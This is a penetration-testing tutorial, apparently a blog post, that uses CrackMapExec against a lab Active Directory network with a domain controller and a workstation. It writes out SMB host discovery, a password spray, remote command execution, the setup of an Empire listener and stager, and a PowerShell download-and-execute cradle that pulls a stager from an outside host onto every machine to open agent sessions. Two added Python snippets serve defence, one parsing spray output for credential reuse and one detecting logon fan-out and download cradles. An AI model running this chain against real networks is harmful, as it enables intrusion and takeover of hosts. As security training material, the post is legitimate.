
CrackMapExec - Owning Networks at speed of light

Today I'm going to talk about a really useful tool called CrackMapExec.
This tool's aim is to automate/ease the process of exploiting/post-exploiting Windows networks.
You can find the repository on GitHub at this address: CrackMapExec Repo
It has very nice integrations with Empire and Metasploit that can help you own a lot of machines with minimal effort.
I'm not going to cover the installation process, it's well detailed in the README.
For this example, we are going to target a Windows network based on Active Directory, and we'll go through the classical steps:

  1. Information Gathering
  2. Password Cracking/Spraying
  3. Getting shells

The infrastructure I built for this test is brain-dead easy, just a domain controller and a workstation.

Let's start with information gathering, we are going to use the SMB module for this task.
The syntax is quite easy:

cme <module> <targets>

In this case:

┌─[riccardo@warmachine]─[~]
└──╼ $cme smb 172.28.128.0/24
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
[*] KTHXBYE!


Looks like we found two hosts with the SMB service active!
In other scenarios I would use something like Responder, bettercap or similar tools in order to gain an initial foothold on the network, but since we are exploiting CME's capabilities we are going the brute force way (again, not my favourite way).
We can start a brute force attempt using lists or specific usernames passed via the command line; for the sake of this exercise we are going to test with a single-word wordlist :D
The syntax for the brute force is straightforward:

cme smb <targets> -u <usernames> -p <passwords>

┌─[✗]─[riccardo@warmachine]─[~]
└──╼ $cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.."
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
[*] KTHXBYE!

How lucky are we? Administrative credentials that work for every machine!
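The discovery and spray output above is easy to eyeball for two hosts, but for a whole /24 you want it in a report. Here is an added example (not part of CrackMapExec or of the original post) that parses CME's smb lines into a host inventory and flags every account whose admin rights were confirmed on more than one host, which is the credential reuse finding a defender will want to remediate first. The regexes are my assumption about the line format shown above; the sample text is copied from the runs in this post.

```python
import re
from collections import defaultdict

# One CME host line: tool tag, ip:port, padded hostname, status tag, message.
LINE_RE = re.compile(
    r"^CME\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?P<host>\S+)\s+\[(?P<tag>[*+\-!])\]\s*(?P<msg>.*?)\s*$"
)
# Discovery message: "Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)"
OS_RE = re.compile(r"^(?P<os>.+?) \(name:(?P<name>[^)]+)\) \(domain:(?P<domain>[^)]+)\)$")
# Successful admin logon: "DOMAIN\Administrator:<secret> (Pwn3d!)"
CRED_RE = re.compile(r"^(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<secret>.*?) \(Pwn3d!\)$")

# Sample input copied from the discovery and spray runs above.
SAMPLE = """
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
[*] KTHXBYE!
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] Executed command
"""

def parse_output(text):
    """One dict per CME host line; banner lines such as '[*] KTHXBYE!' are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]

def inventory(records):
    """ip -> {name, os, domain}, built from the '[*] Windows ...' discovery lines."""
    hosts = {}
    for r in records:
        m = OS_RE.match(r["msg"])
        if r["tag"] == "*" and m:
            hosts[r["ip"]] = {"name": m["name"], "os": m["os"], "domain": m["domain"]}
    return hosts

def admin_reuse(records):
    """account -> sorted ips where CME reported admin rights, only if more than one host."""
    by_account = defaultdict(set)
    for r in records:
        m = CRED_RE.match(r["msg"])
        if r["tag"] == "+" and m:
            by_account[f"{m['domain']}\\{m['user']}"].add(r["ip"])
    return {acct: sorted(ips) for acct, ips in by_account.items() if len(ips) > 1}
```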
Can we execute some commands in those machines? Sure we can:

┌─[riccardo@warmachine]─[~]
└──╼ $sudo cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.." -x whoami
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] Executed command 
CME          172.28.128.3:445 DC01            domain\administrator
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] Executed command 
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 domain\administrator

But that's not enough, is it?
For the shells step, I'm not going to use the CrackMapExec integration with Empire via the REST API, but I'll go for the old-fashioned way:

  1. Generate a PowerShell stager for Empire and drop it into a ps1 file
  2. Serve the PowerShell stager via HTTP
  3. Download and execute the stager in memory
  4. Get an Empire session

Generating an Empire listener and stager is quite easy:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host 172.28.128.1:80
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!
(Empire: listeners/http) > 
(Empire: listeners/http) > back
(Empire: listeners) > usestager multi/launcher
(Empire: stager/multi/launcher) > set Listener http
(Empire: stager/multi/launcher) > set OutFile /tmp/stager.ps1
(Empire: stager/multi/launcher) > execute
[*] Stager output written out to: /tmp/stager.ps1

The payload I used to download the PowerShell script is also very easy:

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://172.28.128.1:443/stager.ps1')

The final command I used to run that payload on every host with CME:

┌─[riccardo@warmachine]─[~]
└──╼ $sudo cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.." -x "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://172.28.128.1:443/stager.ps1')"
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
[*] KTHXBYE!
[+] Initial agent PWMES1B9 from 172.28.128.3 now active (Slack)
[+] Initial agent G8C1LNBM from 172.28.128.4 now active (Slack)

Ahhh! Lovely words!
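Seen from the blue team side, the chain above leaves two loud signals: one source address logging on over the network with the same account to every host in the subnet within minutes, and a PowerShell script block that downloads and runs text from a URL. The following is an added example (not from CrackMapExec, Empire or the original post) that runs both checks over constructed event records; the JSON field names are my assumption, mapped from Security event 4624 (network logon, type 3) and PowerShell script block event 4104.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, one JSON object per line; not real logs.
SAMPLE_EVENTS = """
{"t": "2018-03-18T14:47:01", "id": 4624, "host": "DESKTOP-OA9Q8L2", "user": "Administrator", "src": "172.28.128.1", "logon_type": 3}
{"t": "2018-03-18T14:47:02", "id": 4624, "host": "DC01", "user": "Administrator", "src": "172.28.128.1", "logon_type": 3}
{"t": "2018-03-18T14:50:05", "id": 4624, "host": "DC01", "user": "Administrator", "src": "172.28.128.1", "logon_type": 3}
{"t": "2018-03-18T15:08:10", "id": 4104, "host": "DC01", "script": "IEX (New-Object System.Net.Webclient).DownloadString('http://172.28.128.1:443/stager.ps1')"}
{"t": "2018-03-18T15:08:11", "id": 4104, "host": "DESKTOP-OA9Q8L2", "script": "Get-Process | Sort-Object CPU"}
{"t": "2018-03-18T09:00:00", "id": 4624, "host": "DC01", "user": "alice", "src": "172.28.128.50", "logon_type": 3}
"""

# In-memory download-and-run cradle, as used in the payload above.
CRADLE_RE = re.compile(r"(IEX|Invoke-Expression).*?(DownloadString|DownloadFile)", re.IGNORECASE)

def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def logon_fanout(events, min_hosts=2, window=timedelta(minutes=10)):
    """(user, src) pairs whose network logons reached >= min_hosts distinct hosts inside one window."""
    seen = defaultdict(list)  # (user, src) -> [(time, host)]
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3:
            seen[(e["user"], e["src"])].append((datetime.fromisoformat(e["t"]), e["host"]))
    hits = {}
    for key, entries in seen.items():
        entries.sort()
        for i, (t0, _) in enumerate(entries):
            hosts = {h for t, h in entries[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                hits[key] = sorted(hosts)
                break
    return hits

def download_cradles(events):
    """(host, script) for every script block event that looks like a download cradle."""
    return [(e["host"], e["script"]) for e in events
            if e["id"] == 4104 and CRADLE_RE.search(e.get("script", ""))]
```

The fan-out check is what makes the spray visible even when every logon succeeds (no 4625 failures), which is exactly the case in this post.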

As we saw, this tool contains no magic, but it can be very useful in very large environments!

Happy Hacking!